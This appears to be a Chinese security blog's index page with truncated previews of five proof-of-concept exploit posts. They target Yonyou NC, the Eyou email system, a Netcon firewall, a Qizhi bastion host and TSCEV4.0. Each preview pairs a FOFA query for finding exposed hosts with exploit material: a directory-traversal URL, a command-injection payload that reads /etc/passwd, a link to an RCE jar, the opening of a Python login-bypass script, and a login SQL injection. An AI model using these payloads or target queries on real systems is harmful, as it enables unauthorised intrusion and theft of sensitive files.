描述
用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息
fofa:app=”用友-UFIDA-NC”
POC & EXP
http://127.0.0.1/NCFindWeb?service=...
4年前 (2021-04-17) 6755℃ 3评论
17喜欢
描述
fofa body=”亿邮电子邮件系统”
POC & 利用
POST /webadm/?q=moni_detail.do&action=gragh
type='|cat /etc/passwd||'
...
4年前 (2021-04-17) 7081℃ 0评论
6喜欢
描述
fofa app=”网康科技-下一代防火墙”
利用
利用jar包: https://github.com/Yang0615777/PocList/blob/main/QiAnXin-WangKangFirewall-RCE...
4年前 (2021-04-17) 4469℃ 0评论
6喜欢
描述
齐治堡垒机某版本任意用户登录.md
fofa app=”齐治科技-堡垒机”
POC & EXP
import requests,sys,re,urllib3
urllib3.disable_warnings(url...
4年前 (2021-04-17) 6058℃ 0评论
9喜欢
描述
登录处抓包,然后闭合username字段重发引发报错
fofa title=”TSCEV4.0″
POC & 利用
# POC测试(出现 root:x:0:0 则存在漏洞)
op=login&userna...
4年前 (2021-04-17) 2873℃ 0评论
6喜欢
